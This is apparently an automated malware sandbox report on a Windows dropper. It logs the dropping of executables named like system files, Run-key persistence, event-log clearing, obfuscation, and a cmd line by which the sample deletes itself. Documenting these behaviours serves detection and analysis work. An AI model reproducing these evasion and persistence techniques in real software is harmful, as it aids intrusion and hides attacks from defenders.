Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: netutils.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: samcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\Temp\ .exe

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\ .exe

Window detected: Number of UI elements: 96

Source:	Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405CFF

PE file contains sections with non-standard names

Source: v5.exe.0.dr

Static PE information: section name: UPX2

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Temp\v5.exe	Code function: 2_2_00408FB0 push eax; ret	2_2_00408FDE
Source: C:\Windows\Temp\server.exe	Code function: 3_2_004046E0 push eax; ret	3_2_0040470E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10069820 push eax; ret	3_2_1006984E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100FAA45 push edi; ret	3_2_100FAA46
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10025EF1 push cs; ret	3_2_10025EF2
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_00408FB0 push eax; ret	4_2_00408FDE
Source: C:\Windows\Temp\ .exe	Code function: 5_2_004483B0 push eax; ret	5_2_004483CE
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447450 push eax; ret	5_2_00447464
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447450 push eax; ret	5_2_0044748C
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00449957 push ecx; ret	5_2_00449967
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_004046E0 push eax; ret	8_2_0040470E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10069820 push eax; ret	8_2_1006984E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100FAA45 push edi; ret	8_2_100FAA46
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10025EF1 push cs; ret	8_2_10025EF2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\Temp\server.exe	Executable created and started: C:\Windows\SysWOW64\033726\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Executable created and started: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\server.exe	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\ .exe	Jump to behavior
Source: unknown	Executable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: unknown	Executable created and started: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\v5.exe	Jump to behavior

Contains functionality to download and launch executables

Source: C:\Windows\Temp\server.exe

3_2_10001A20

Creates processes with suspicious names

Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior

Drops PE files

Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\ .exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\v5.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\ .exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\v5.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to dropped file

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,

2_2_0040597D

Source: C:\Windows\Temp\server.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,		5_2_0043D078
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		5_2_0043A8F0

Contains functionality to clear windows event logs (to hide its activities)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,

3_2_1000A4D0

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Temp\v5.exe

4_2_00407470

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
